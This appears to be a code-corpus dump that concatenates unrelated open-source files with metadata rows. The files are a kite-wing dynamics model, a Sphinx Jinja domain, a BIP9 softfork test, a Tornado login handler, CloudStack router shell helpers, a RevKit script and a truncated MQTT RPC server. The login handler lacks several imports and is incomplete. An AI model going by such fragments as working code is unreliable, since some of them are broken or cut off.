self._g_g = np.matrix([[0.0], [0.0], [system_params['phys']['g']]])
self._air_density = system_params['phys']['rho']
self._dynamic_viscosity = sim_params['phys_sim']['dynamic_viscosity']
self._aero_model = aero_model
self._motor_model = motor_model
self._tether_force_model = tether_force_model
@type_util.RequireMatrixArguments(None, (3, 3))
def _CalcGravityForceMomentPos(self, dcm_g2b):
return ForceMomentPos(dcm_g2b * (self._wing_mass * self._g_g),
np.matrix(np.zeros((3, 1))), self._pos_com_b)
@type_util.RequireMatrixArguments(None, None, None, None, (3, 1), (1, 1),
(3, 1))
def _CalcMotorForceMomentPos(self, v_rel, alpha, beta, omega_b,
thrust, motor_moment):
"""Calculates the motor forces and moments."""
return self._motor_model.CalcMotorForceMomentPos(
v_rel, alpha, beta, omega_b, thrust, motor_moment)
@type_util.RequireMatrixArguments(None, (3, 3), (3, 1), (3, 1), (3, 1))
def _CalcTetherForceMomentPos(self, dcm_g2b, wing_pos_g, wing_vel_g, wind_g):
tether_force_b = self._tether_force_model.CalcBodyForce(dcm_g2b, wing_pos_g,
wing_vel_g, wind_g)
return ForceMomentPos(tether_force_b, np.matrix(np.zeros((3, 1))),
_CalcBridleKnotPos(tether_force_b, self._bridle_pos,
self._bridle_y_offset,
self._bridle_radius))
def CalcTetherForceG(self, state, inputs):
return state.dcm_g2b.T * self._tether_force_model.CalcBodyForce(
state.dcm_g2b, state.wing_pos_g, state.wing_vel_g, inputs.wind_g)
def CalcTetherTensionRollPitch(self, state, inputs):
tether_force_b = self._tether_force_model.CalcBodyForce(
state.dcm_g2b, state.wing_pos_g, state.wing_vel_g, inputs.wind_g)
return geometry.TetherForceCartToSph(tether_force_b)
@type_util.RequireMatrixArguments(None, None, None, None, (3, 1),
(system_types.kNumFlaps, 1), None)
def CalcAeroForceMomentPos(self, v_rel, alpha, beta, omega_b, flaps,
thrust_coeff):
"""Calculate the aerodynamic force and moments on the wing.
Args:
v_rel: Airspeed [m/s].
alpha: Angle-of-attack [rad].
beta: Angle-of-sideslip [rad].
omega_b: Wing body-rates [rad/s] (3-by-1 np.matrix).
flaps: Flap deflections (kNumFlaps-by-1 np.matrix).
thrust_coeff: Thrust coefficient [#] using wind turbine convention.
Returns:
(ForceMomentPos in body coordinates, force coeffs., moment coeffs.)
"""
reynolds_number = ((v_rel * self._wing_chord * self._air_density)
/ self._dynamic_viscosity)
dynamic_pressure = 0.5 * self._air_density * v_rel**2.0
length_scale = np.matrix([[self._wing_span],
[self._wing_chord],
[self._wing_span]])
omega_hat = np.multiply(omega_b, length_scale) / (2.0 * v_rel)
(cf, cm) = self._aero_model.CalcFMCoeff(alpha, beta, reynolds_number,
flaps, omega_hat, thrust_coeff)
return (ForceMomentPos(dynamic_pressure * self._wing_area * cf,
(dynamic_pressure * self._wing_area
* np.multiply(length_scale, cm)),
np.matrix(np.zeros((3, 1)))),
cf, cm)
def _BodyForceMomentPosToComForceMoment(self, force_moment_pos_list):
force = np.matrix(np.zeros((3, 1)))
moment = np.matrix(np.zeros((3, 1)))
for force_moment_pos in force_moment_pos_list:
force += force_moment_pos.force
moment += force_moment_pos.moment
moment += np.cross(force_moment_pos.pos - self._pos_com_b,
force_moment_pos.force, axis=0)
return ForceMoment(force, moment)
def CalcDeriv(self, state, inputs):
"""Calculates the derivative of the wing state vector.
Args:
state: A WingState.
inputs: A WingInputs.
Returns:
A WingState.Tangent containing the derivative of the state.
"""
euler_moment = np.cross(self._wing_inertia_matrix * state.omega_b,
state.omega_b, axis=0)
v_rel, alpha, beta = state.CalcAerodynamicAngles(inputs.wind_g)
# Fixing total thrust coefficient to 0.0 for this application.
# NOTE: By accounting for the rotor wake effect on the tail,
# we found that the synthesized gains yield worse flight quality than when
# the effect is ignored (see b/110491871 for details).
thrust_coeff = 0.0
aero_force_moment_pos, _, _ = self.CalcAeroForceMomentPos(
v_rel, alpha, beta, state.omega_b, inputs.flaps, thrust_coeff)
force_moment_com = self._BodyForceMomentPosToComForceMoment([
self._CalcGravityForceMomentPos(state.dcm_g2b),
self._CalcMotorForceMomentPos(
v_rel, alpha, beta, state.omega_b, inputs.thrust,
inputs.motor_moment),
self._CalcTetherForceMomentPos(state.dcm_g2b, state.wing_pos_g,
state.wing_vel_g, inputs.wind_g),
aero_force_moment_pos,
ForceMomentPos(np.matrix(np.zeros((3, 1))), euler_moment,
np.matrix(np.zeros((3, 1))))
])
# Calculate center-of-mass acceleration.
accel_com_g = (state.dcm_g2b.T * force_moment_com.force) / self._wing_mass
# Calculate body angular acceleration.
omega_b_dot = np.matrix(np.linalg.solve(self._wing_inertia_matrix,
force_moment_com.moment))
wing_accel_g = accel_com_g - state.dcm_g2b.T * (
np.cross(state.omega_b,
np.cross(state.omega_b, self._pos_com_b, axis=0), axis=0)
+ np.cross(omega_b_dot, self._pos_com_b, axis=0))
return WingState.Tangent(domega_b=omega_b_dot, ddcm_g2b=state.omega_b,
dwing_vel_g=wing_accel_g,
dwing_pos_g=state.wing_vel_g)
def CalcDVbCom(self, state, state_dot):
"""Calculates the rate of change of Vb for unit tests."""
return (state.dcm_g2b * state_dot.dwing_vel_g
- np.cross(state.omega_b, state.dcm_g2b * state.wing_vel_g, axis=0)
+ np.cross(state_dot.domega_b, self._pos_com_b, axis=0))
def CalcEnergy(self, state):
"""Calculates energy of the rigid body model for unit tests."""
wing_com_pos_g = state.wing_pos_g + state.dcm_g2b.T * self._pos_com_b
wing_com_vel_g = (state.wing_vel_g
+ (state.dcm_g2b.T
* np.cross(state.omega_b, self._pos_com_b, axis=0)))
return ((0.5 * np.transpose(state.omega_b)
* self._wing_inertia_matrix * state.omega_b)
+ (0.5 * self._wing_mass * np.transpose(wing_com_vel_g)
* wing_com_vel_g)
- self._wing_mass * np.transpose(self._g_g) * wing_com_pos_g)[0, 0]
def CalcLinearization(f, state, inputs, state_step_sizes, input_step_sizes):
"""Calculate the system matrices for the Wing model.
Produces a linearized model:
f(x + dx, u + du) ~ f(x) + A * dx + B * du
where f is an arbitrary function, x is the wing state and u are
the wing inputs.
Args:
f: A function mapping an n-by-1 np.matrix and an m-by-1 np.matrix to
a n-by-1 np.matrix.
state: An instance of a state class from type_util.
inputs: An instance of a named vector from type_util.
state_step_sizes: A vector of step sizes for the state.
input_step_sizes: A vector of step sizes for the inputs.
Returns:
A tuple (A, B) where A and B are both of type np.matrix.
"""
num_states = state.Tangent.GetDim()
num_inputs = inputs.GetDim()
num_outputs = f(state, inputs).shape[0]
dfdx = np.matrix(np.zeros((num_outputs, num_states)))
dfdu = np.matrix(np.zeros((num_outputs, num_inputs)))
for i in range(num_states):
h = state_step_sizes[i, 0]
e = state.Tangent.FromVector(np.matrix([
[1.0 if j == i else 0.0] for j in range(num_states)]))
dfdx[:, i] = (f(state.Increment(e, step=h), inputs)
- f(state.Increment(e, step=-h), inputs)) / (2.0 * h)
for i in range(num_inputs):
h = input_step_sizes[i, 0]
e = np.matrix([[1.0 if j == i else 0.0] for j in range(num_inputs)])
dfdu[:, i] = (
f(state, inputs.FromVector(inputs.ToVector() + h * e))
- f(state, inputs.FromVector(inputs.ToVector() - h * e))) / (2.0 * h)
return (dfdx, dfdu)
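# Illustrative pairing of CalcLinearization with Wing.CalcDeriv (not in the
# original file).  The wing, state, and inputs are assumed to be constructed
# elsewhere, the step sizes are assumed values, and WingState.Tangent is
# assumed to expose ToVector() like the other type_util named vectors.
def _ExampleLinearizeWing(wing, state, inputs):
  state_steps = np.matrix([[1.0e-4]] * state.Tangent.GetDim())
  input_steps = np.matrix([[1.0e-4]] * inputs.GetDim())
  f = lambda x, u: wing.CalcDeriv(x, u).ToVector()
  return CalcLinearization(f, state, inputs, state_steps, input_steps)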
| apache-2.0 | -7,089,321,281,316,663,000 | 41.222057 | 80 | 0.614592 | false |
offlinehacker/sphinxcontrib.jinjadomain | sphinxcontrib/jinjadomain.py | 1 | 3445 | """
sphinxcontrib.jinjadomain
~~~~~~~~~~~~~~~~~~~~~~~~
The jinja domain for documenting jinja templates.
:copyright: Copyright 2012 by Jaka Hudoklin
:license: BSD, see LICENSE for details.
"""
import re
import os
from sphinx import addnodes
from sphinx.domains import Domain, ObjType, Index
from sphinx.directives import ObjectDescription
from sphinx.util.docfields import GroupedField, TypedField
def jinja_resource_anchor(method, path):
path = re.sub(r'[<>:/]', '-', path)
return method.lower() + '-' + path
class JinjaResource(ObjectDescription):
doc_field_types = [
TypedField('parameter', label='Parameters',
names=('param', 'parameter', 'arg', 'argument'),
typerolename='obj', typenames=('paramtype', 'type')),
]
method = "template"
def handle_signature(self, sig, signode):
method = self.method.upper() + ' '
signode += addnodes.desc_name(method, method)
signode += addnodes.desc_name(sig, sig)
fullname = "Template" + ' ' + sig
signode['method'] = self.method
signode['path'] = sig
signode['fullname'] = fullname
return (fullname, self.method, sig)
def needs_arglist(self):
return False
def add_target_and_index(self, name_cls, sig, signode):
signode['ids'].append(jinja_resource_anchor(*name_cls[1:]))
self.env.domaindata['jinja'][self.method][sig] = (self.env.docname, '')
def get_index_text(self, modname, name):
return ''
class JinjaIndex(Index):
name = 'jinjatemplates'
localname = 'templates'
shortname = 'templates'
def __init__(self, *args, **kwargs):
super(JinjaIndex, self).__init__(*args, **kwargs)
def grouping_prefix(self, path):
return os.path.split(path)[0]
def generate(self, docnames=None):
content = {}
items = ((method, path, info)
for method, routes in self.domain.routes.iteritems()
for path, info in routes.iteritems())
items = sorted(items, key=lambda item: item[1])
for method, path, info in items:
entries = content.setdefault(self.grouping_prefix(path), [])
entries.append([
path, 0, info[0],
jinja_resource_anchor(method, path), '', '', info[1]
])
content = content.items()
content.sort(key=lambda (k, v): k)
return (content, True)
class JinjaDomain(Domain):
"""Jinja domain."""
name = 'jinja'
label = 'jinja'
object_types = {
'template': ObjType('template', 'template', 'obj'),
}
directives = {
'template': JinjaResource,
}
initial_data = {
'template': {}, # path: (docname, synopsis)
}
indices = [JinjaIndex]
@property
def routes(self):
return dict((key, self.data[key]) for key in self.object_types)
def clear_doc(self, docname):
for typ, routes in self.routes.iteritems():
for path, info in routes.items():
if info[0] == docname:
del routes[path]
def get_objects(self):
for method, routes in self.routes.iteritems():
for path, info in routes.iteritems():
anchor = jinja_resource_anchor(method, path)
yield (path, path, method, info[0], anchor, 1)
def setup(app):
app.add_domain(JinjaDomain)
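# Usage sketch (assumption, not part of the original file): a Sphinx project
# would enable this extension and document a template roughly as follows; the
# template path and parameter below are hypothetical.
#
#   # conf.py
#   extensions = ['sphinxcontrib.jinjadomain']
#
#   .. jinja:template:: templates/user_profile.html
#
#      :param user: user object rendered by the template
#
# The directive name combines the domain name ('jinja') with the directive key
# ('template') registered above.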
| bsd-2-clause | 4,406,314,289,829,284,400 | 27.708333 | 79 | 0.584906 | false |
deuscoin-org/deuscoin-core | qa/rpc-tests/bip9-softforks.py | 1 | 8792 | #!/usr/bin/env python2
# Copyright (c) 2015 The Deuscoin Core developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.test_framework import ComparisonTestFramework
from test_framework.util import *
from test_framework.mininode import CTransaction, NetworkThread
from test_framework.blocktools import create_coinbase, create_block
from test_framework.comptool import TestInstance, TestManager
from test_framework.script import CScript, OP_1NEGATE, OP_NOP3, OP_DROP
from binascii import hexlify, unhexlify
import cStringIO
import time
import itertools
'''
This test is meant to exercise BIP forks
Connect to a single node.
regtest lock-in with 108/144 block signalling
activation after a further 144 blocks
mine 2 blocks and save coinbases for later use
mine 141 blocks to transition from DEFINED to STARTED
mine 100 blocks signalling readiness and 44 not signalling, in order to fail to change state this period
mine 108 blocks signalling readiness and 36 blocks not signalling readiness (STARTED->LOCKED_IN)
mine a further 143 blocks (LOCKED_IN)
test that enforcement has not triggered (which triggers ACTIVE)
test that enforcement has triggered
'''
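# Threshold arithmetic behind the plan above, for reference: the regtest window
# is 144 blocks and lock-in needs 108 signalling blocks (75%).  Test 2 mines
# 50 + 50 = 100 signalling and 20 + 24 = 44 non-signalling blocks, which falls
# short; Test 3 mines 58 + 50 = 108 signalling and 26 + 10 = 36 non-signalling
# blocks, which reaches LOCKED_IN.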
class BIP9SoftForksTest(ComparisonTestFramework):
def __init__(self):
self.num_nodes = 1
def setup_network(self):
self.nodes = start_nodes(1, self.options.tmpdir,
extra_args=[['-debug', '-whitelist=127.0.0.1']],
binary=[self.options.testbinary])
def run_test(self):
self.test = TestManager(self, self.options.tmpdir)
self.test.add_all_connections(self.nodes)
NetworkThread().start() # Start up network handling in another thread
self.test.run()
def create_transaction(self, node, coinbase, to_address, amount):
from_txid = node.getblock(coinbase)['tx'][0]
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
tx = CTransaction()
f = cStringIO.StringIO(unhexlify(rawtx))
tx.deserialize(f)
tx.nVersion = 2
return tx
def sign_transaction(self, node, tx):
signresult = node.signrawtransaction(hexlify(tx.serialize()))
tx = CTransaction()
f = cStringIO.StringIO(unhexlify(signresult['hex']))
tx.deserialize(f)
return tx
def generate_blocks(self, number, version, test_blocks = []):
for i in xrange(number):
block = create_block(self.tip, create_coinbase(self.height), self.last_block_time + 1)
block.nVersion = version
block.rehash()
block.solve()
test_blocks.append([block, True])
self.last_block_time += 1
self.tip = block.sha256
self.height += 1
return test_blocks
def get_bip9_status(self, key):
info = self.nodes[0].getblockchaininfo()
for row in info['bip9_softforks']:
if row['id'] == key:
return row
raise IndexError ('key:"%s" not found' % key)
def test_BIP(self, bipName, activated_version, invalidate, invalidatePostSignature):
# generate some coins for later
self.coinbase_blocks = self.nodes[0].generate(2)
self.height = 3 # height of the next block to build
self.tip = int ("0x" + self.nodes[0].getbestblockhash() + "L", 0)
self.nodeaddress = self.nodes[0].getnewaddress()
self.last_block_time = int(time.time())
assert_equal(self.get_bip9_status(bipName)['status'], 'defined')
# Test 1
# Advance from DEFINED to STARTED
test_blocks = self.generate_blocks(141, 4)
yield TestInstance(test_blocks, sync_every_block=False)
assert_equal(self.get_bip9_status(bipName)['status'], 'started')
# Test 2
# Fail to achieve LOCKED_IN 100 out of 144 signal bit 1
# using a variety of bits to simulate multiple parallel softforks
test_blocks = self.generate_blocks(50, activated_version) # 0x20000001 (signalling ready)
test_blocks = self.generate_blocks(20, 4, test_blocks) # 0x00000004 (signalling not)
test_blocks = self.generate_blocks(50, activated_version, test_blocks) # 0x20000101 (signalling ready)
test_blocks = self.generate_blocks(24, 4, test_blocks) # 0x20010000 (signalling not)
yield TestInstance(test_blocks, sync_every_block=False)
assert_equal(self.get_bip9_status(bipName)['status'], 'started')
# Test 3
# 108 out of 144 signal bit 1 to achieve LOCKED_IN
# using a variety of bits to simulate multiple parallel softforks
test_blocks = self.generate_blocks(58, activated_version) # 0x20000001 (signalling ready)
test_blocks = self.generate_blocks(26, 4, test_blocks) # 0x00000004 (signalling not)
test_blocks = self.generate_blocks(50, activated_version, test_blocks) # 0x20000101 (signalling ready)
test_blocks = self.generate_blocks(10, 4, test_blocks) # 0x20010000 (signalling not)
yield TestInstance(test_blocks, sync_every_block=False)
assert_equal(self.get_bip9_status(bipName)['status'], 'locked_in')
# Test 4
# 143 more version 536870913 blocks (waiting period-1)
test_blocks = self.generate_blocks(143, 4)
yield TestInstance(test_blocks, sync_every_block=False)
assert_equal(self.get_bip9_status(bipName)['status'], 'locked_in')
# Test 5
# Check that the new rule is enforced
spendtx = self.create_transaction(self.nodes[0],
self.coinbase_blocks[0], self.nodeaddress, 1.0)
invalidate(spendtx)
spendtx = self.sign_transaction(self.nodes[0], spendtx)
spendtx.rehash()
invalidatePostSignature(spendtx)
spendtx.rehash()
block = create_block(self.tip, create_coinbase(self.height), self.last_block_time + 1)
block.nVersion = activated_version
block.vtx.append(spendtx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.last_block_time += 1
self.tip = block.sha256
self.height += 1
yield TestInstance([[block, True]])
assert_equal(self.get_bip9_status(bipName)['status'], 'active')
# Test 6
# Check that the new sequence lock rules are enforced
spendtx = self.create_transaction(self.nodes[0],
self.coinbase_blocks[1], self.nodeaddress, 1.0)
invalidate(spendtx)
spendtx = self.sign_transaction(self.nodes[0], spendtx)
spendtx.rehash()
invalidatePostSignature(spendtx)
spendtx.rehash()
block = create_block(self.tip, create_coinbase(self.height), self.last_block_time + 1)
block.nVersion = 5
block.vtx.append(spendtx)
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.last_block_time += 1
yield TestInstance([[block, False]])
# Restart all
stop_nodes(self.nodes)
wait_deuscoinds()
shutil.rmtree(self.options.tmpdir)
self.setup_chain()
self.setup_network()
self.test.clear_all_connections()
self.test.add_all_connections(self.nodes)
NetworkThread().start() # Start up network handling in another thread
def get_tests(self):
for test in itertools.chain(
self.test_BIP('csv', 536870913, self.sequence_lock_invalidate, self.donothing),
self.test_BIP('csv', 536870913, self.mtp_invalidate, self.donothing),
self.test_BIP('csv', 536870913, self.donothing, self.csv_invalidate)
):
yield test
def donothing(self, tx):
return
def csv_invalidate(self, tx):
'''Modify the signature in vin 0 of the tx to fail CSV
Prepends -1 CSV DROP in the scriptSig itself.
'''
tx.vin[0].scriptSig = CScript([OP_1NEGATE, OP_NOP3, OP_DROP] +
list(CScript(tx.vin[0].scriptSig)))
def sequence_lock_invalidate(self, tx):
        '''Modify the nSequence to make it fail once the sequence lock rule is activated (high timespan)
'''
tx.vin[0].nSequence = 0x00FFFFFF
tx.nLockTime = 0
def mtp_invalidate(self, tx):
        '''Modify the nLockTime to make it fail once the MTP rule is activated
'''
# Disable Sequence lock, Activate nLockTime
tx.vin[0].nSequence = 0x90FFFFFF
tx.nLockTime = self.last_block_time
if __name__ == '__main__':
BIP9SoftForksTest().main() | mit | 258,358,214,866,683,870 | 38.968182 | 110 | 0.645018 | false |
gooftroop/Zeus | ef5/lib/handlers/authentication.py | 1 | 5728 | """
"""
import logging
import settings
import tornado.gen as gen
from lib.auth import login, logout, is_authenticated
from lib.error.exceptions import AuthenticationError
class LoginHandler(BaseHandler):
"""
TODO
    As designed, Tornado is stateless, which means that everything goes back to the client.
    This can be insecure, so in the future we might consider patching Tornado to check the
    session if the XSRF token, Element session id, and current user are not kept in cookies
"""
logger = logging.getLogger("auth")
def get_setup_mode(self):
try:
with open("/tmp/fcemode", "r") as myfile:
return myfile.read()
except (IOError, Exception) as e:
self.logger.warning("Unable to open setupmode file: {0}".format(e))
return None
def get(self):
# Set client headers
self.set_header('Content-Type', 'application/json')
self.set_header(settings.XSRF_TOKEN, self.xsrf_token)
response = {}
########################################################################################################
# Get setup mode
########################################################################################################
ret = self.get_setup_mode()
self.logger.info("Server in initial setup mode? {0}".format((ret is not None)))
response["initial-setup-mode"] = ret is not None
########################################################################################################
# Get serial number
########################################################################################################
response["serial-number"] = ret if ret else ""
########################################################################################################
# Get hostname
########################################################################################################
proc = subprocess.Popen(["hostname"], stdout=subprocess.PIPE, shell=True)
(out, err) = proc.communicate()
if err is not None:
self.logger.error(err)
response["hostname"] = out
self.response.respond(response)
@gen.coroutine
# TODO HTTP basic auth support
def post(self):
username = None
try:
username = self.request.body_arguments["username"]
if isinstance(username, list):
username = username[0]
except (web.MissingArgumentError, KeyError) as e:
pass
# Fall through to check existence of password
try:
password = self.request.body_arguments["password"]
if isinstance(password, list):
password = password[0]
if not username:
msg = "Username is required"
self.logger.error(msg)
self.send_error(status_code=401, reason=msg)
return
except (web.MissingArgumentError, KeyError) as e:
# Attempt to use HTTP Basic Auth
basic_auth = self.request.headers.get('Authorization')
            if not basic_auth or not basic_auth.startswith('Basic'):
msg = "Username and Password are required" if not username else "Password is required"
self.logger.error(msg)
self.send_error(status_code=401, reason=msg)
return
else:
decoded = base64.decodestring(basic_auth[6:])
username, password = decoded.split(':', 2)
self.clear_header('Authorization')
try:
yield login(self, username, password)
# Now that we've authenticated, get the setup mode and serial number
# TODO the following is similar to atlasHandler.get. Let's see if we can generalize
# TODO convert strings to consts
# TODO this relies on hard coded context 'default' - this needs to be dynamic
try:
# TODO This needs to be converted to using the Element DAO
connection = ElementXMLRPC(url=settings.ELEMENT_URL,
session_id=self._new_cookie.get(settings.ELEMENT_SESSION_ID).value)
self.response.respond({"message": "Login Successful"})
except ElementError as e:
msg = "An error occurred while connecting to Element '{0}': {1}".format(type, e)
self.logger.exception(msg)
self.redirect("/atlas/api/logout", permanent=True)
except AuthenticationError as e:
# TODO we should check to see if we can resolve any messages coming from pam to readable messages
msg = "Login Failed. {0}".format(str(e))
self.logger.error(msg)
self.logger.error(traceback.format_exc())
self.send_error(status_code=401, reason=msg)
except Exception as e:
msg = "Login Failed. {0}".format(str(e))
self.logger.error(msg)
self.logger.error(traceback.format_exc())
self.send_error(status_code=401, reason=msg)
class LogoutHandler(BaseHandler):
"""
"""
logger = logging.getLogger("auth")
@gen.coroutine
def get(self):
"""
:return:
"""
try:
yield logout(self)
self.clear_cookie(settings.XSRF_TOKEN)
self.response.respond({"message": "Logout Successful"})
except AuthenticationError as e:
msg = "Logout Failed. {0}".format(str(e))
self.logger.error(msg)
self.send_error(status_code=400, reason=msg)
| mit | -561,951,879,802,041,500 | 36.933775 | 112 | 0.516585 | false |
jcshen007/cloudstack | systemvm/patches/debian/config/opt/cloud/bin/cs/CsHelper.py | 1 | 7368 | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" General helper functions
for use in the configuration process
"""
import subprocess
import logging
import os.path
import sys
import re
import shutil
from netaddr import *
from pprint import pprint
PUBLIC_INTERFACES = {"router" : "eth2", "vpcrouter" : "eth1"}
STATE_COMMANDS = {"router" : "ip addr | grep eth0 | grep inet | wc -l | xargs bash -c 'if [ $0 == 2 ]; then echo \"MASTER\"; else echo \"BACKUP\"; fi'",
"vpcrouter" : "ip addr | grep eth1 | grep state | awk '{print $9;}' | xargs bash -c 'if [ $0 == \"UP\" ]; then echo \"MASTER\"; else echo \"BACKUP\"; fi'"}
def reconfigure_interfaces(router_config, interfaces):
for interface in interfaces:
cmd = "ip link show %s | grep 'state DOWN'" % interface.get_device()
for device in execute(cmd):
if " DOWN " in device:
cmd = "ip link set %s up" % interface.get_device()
# If redundant only bring up public interfaces that are not eth1.
# Reason: private gateways are public interfaces.
# master.py and keepalived will deal with eth1 public interface.
if router_config.is_redundant() and interface.is_public():
state_cmd = STATE_COMMANDS[router_config.get_type()]
logging.info("Check state command => %s" % state_cmd)
state = execute(state_cmd)[0]
logging.info("Route state => %s" % state)
if interface.get_device() != PUBLIC_INTERFACES[router_config.get_type()] and state == "MASTER":
execute(cmd)
else:
execute(cmd)
def is_mounted(name):
for i in execute("mount"):
vals = i.lstrip().split()
if vals[0] == "tmpfs" and vals[2] == name:
return True
return False
def mount_tmpfs(name):
if not is_mounted(name):
execute("mount tmpfs %s -t tmpfs" % name)
def umount_tmpfs(name):
if is_mounted(name):
execute("umount %s" % name)
def rm(name):
os.remove(name) if os.path.isfile(name) else None
def rmdir(name):
if name:
shutil.rmtree(name, True)
def mkdir(name, mode, fatal):
try:
os.makedirs(name, mode)
except OSError as e:
if e.errno != 17:
            print "failed to make directories " + name + " due to: " + e.strerror
if(fatal):
sys.exit(1)
def updatefile(filename, val, mode):
""" add val to file """
handle = open(filename, 'r')
    for line in handle.readlines():
if line.strip().lstrip() == val:
return
# set the value
handle.close()
handle = open(filename, mode)
handle.write(val)
handle.close()
def bool_to_yn(val):
if val:
return "yes"
return "no"
def get_device_info():
""" Returns all devices on system with their ipv4 ip netmask """
list = []
for i in execute("ip addr show"):
vals = i.strip().lstrip().rstrip().split()
if vals[0] == "inet":
to = {}
to['ip'] = vals[1]
to['dev'] = vals[-1]
to['network'] = IPNetwork(to['ip'])
to['dnsmasq'] = False
list.append(to)
return list
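# Example of the structure returned by get_device_info() (the addresses are
# illustrative assumptions; they depend on the router's actual interfaces):
#   [{'ip': '10.1.1.1/24', 'dev': 'eth0',
#     'network': IPNetwork('10.1.1.1/24'), 'dnsmasq': False}, ...]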
def get_domain():
for line in open("/etc/resolv.conf"):
vals = line.lstrip().split()
if vals[0] == "domain":
return vals[1]
return "cloudnine.internal"
def get_device(ip):
""" Returns the device which has a specific ip
If the ip is not found returns an empty string
"""
for i in execute("ip addr show"):
vals = i.strip().lstrip().rstrip().split()
if vals[0] == "inet":
if vals[1].split('/')[0] == ip:
return vals[-1]
return ""
def get_ip(device):
""" Return first ip on an interface """
cmd = "ip addr show dev %s" % device
for i in execute(cmd):
vals = i.lstrip().split()
if (vals[0] == 'inet'):
return vals[1]
return ""
def definedinfile(filename, val):
""" Check if val is defined in the file """
for line in open(filename):
if re.search(val, line):
return True
return False
def addifmissing(filename, val):
""" Add something to a file
if it is not already there """
if not os.path.isfile(filename):
logging.debug("File %s doesn't exist, so create" % filename)
open(filename, "w").close()
if not definedinfile(filename, val):
updatefile(filename, val + "\n", "a")
logging.debug("Added %s to file %s" % (val, filename))
return True
return False
def get_hostname():
for line in open("/etc/hostname"):
return line.strip()
def execute(command):
""" Execute command """
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
p.wait()
rc = p.returncode
logging.debug("Executed: %s - exitstatus=%s " % (command, rc))
result = p.communicate()[0]
return result.splitlines()
def save_iptables(command, iptables_file):
""" Execute command """
logging.debug("Saving iptables for %s" % command)
result = execute(command)
fIptables = open(iptables_file, "w+")
for line in result:
fIptables.write(line)
fIptables.write("\n")
fIptables.close()
def execute2(command):
""" Execute command """
logging.debug("Executing: %s" % command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
p.wait()
return p
def service(name, op):
execute("service %s %s" % (name, op))
logging.info("Service %s %s" % (name, op))
def start_if_stopped(name):
ret = execute2("service %s status" % name)
if ret.returncode:
execute2("service %s start" % name)
def hup_dnsmasq(name, user):
pid = ""
for i in execute("ps -ef | grep %s" % name):
vals = i.lstrip().split()
if (vals[0] == user):
pid = vals[1]
if pid:
logging.info("Sent hup to %s", name)
execute("kill -HUP %s" % pid)
else:
service("dnsmasq", "start")
def copy_if_needed(src, dest):
""" Copy a file if the destination does not already exist
"""
if os.path.isfile(dest):
return
copy(src, dest)
def copy(src, dest):
"""
copy source to destination.
"""
try:
shutil.copy2(src, dest)
except IOError:
        logging.error("Could not copy %s to %s" % (src, dest))
else:
logging.info("Copied %s to %s" % (src, dest))
| apache-2.0 | -8,724,128,362,881,490,000 | 28.007874 | 173 | 0.588626 | false |
ah744/ScaffCC_RKQC | rkqc/tools/embed_truth_table.py | 1 | 1594 | #!/home/adam/Documents/revkit-1.3/python
#!/usr/bin/python
# RevKit: A Toolkit for Reversible Circuit Design (www.revkit.org)
# Copyright (C) 2009-2011 The RevKit Developers <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys, os
sys.path.append(os.path.dirname(sys.path[0]))
from revkit import *
opts = program_options()
opts.add_option( "filename", "PLA filename containing an irreversible function specification" ) \
.add_option( "specname", "Filename where to write the embedded specification" ) \
.add_option( "garbage_name", "g", "Name for the garbage lines added with embedding the specification" )
opts.parse( sys.argv )
if not( opts.good() and opts.is_set( "filename" ) and opts.is_set( "specname" ) ):
print opts
exit( 1 )
base = binary_truth_table()
spec = binary_truth_table()
read_pla( base, opts["filename"] )
embed_truth_table( spec, base, garbage_name = opts["garbage_name"] )
write_specification( spec, opts["specname"] )
| bsd-2-clause | 4,276,062,404,617,988,000 | 36.952381 | 107 | 0.732748 | false |
contactless/mqtt-rpc | python/server.py | 1 | 2415 | #!/usr/bin/python
import argparse
try:
import mosquitto
except ImportError:
import paho.mqtt.client as mosquitto
import time, random
import sys
from mqttrpc import MQTTRPCResponseManager, dispatcher
import logging
logging.getLogger().setLevel(logging.DEBUG)
@dispatcher.add_method
def foobar(**kwargs):
return kwargs["foo"] + kwargs["bar"]
class TMQTTRPCServer(object):
def __init__(self, client, driver_id):
self.client = client
self.driver_id = driver_id
def on_mqtt_message(self, mosq, obj, msg):
print msg.topic
print msg.payload
parts = msg.topic.split('/')
driver_id = parts[3]
service_id = parts[4]
method_id = parts[5]
client_id = parts[6]
response = MQTTRPCResponseManager.handle(msg.payload, service_id, method_id, dispatcher)
self.client.publish("/rpc/v1/%s/%s/%s/%s/reply" % (self.driver_id, service_id, method_id, client_id ), response.json)
def setup(self):
for service, method in dispatcher.iterkeys():
self.client.publish("/rpc/v1/%s/%s/%s" % (self.driver_id, service, method), "1", retain=True)
self.client.subscribe("/rpc/v1/%s/%s/%s/+" % (self.driver_id, service, method))
# Dispatcher is dictionary {<method_name>: callable}
dispatcher[("test", "echo")] = lambda s: s
dispatcher[("test", "add")] = lambda a, b: a + b
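# How a client reaches these methods over MQTT (reference sketch; the exact
# JSON-RPC payload fields are an assumption based on the mqttrpc library, not
# shown in this file): the server subscribes to
#   /rpc/v1/<driver_id>/<service>/<method>/<client_id>
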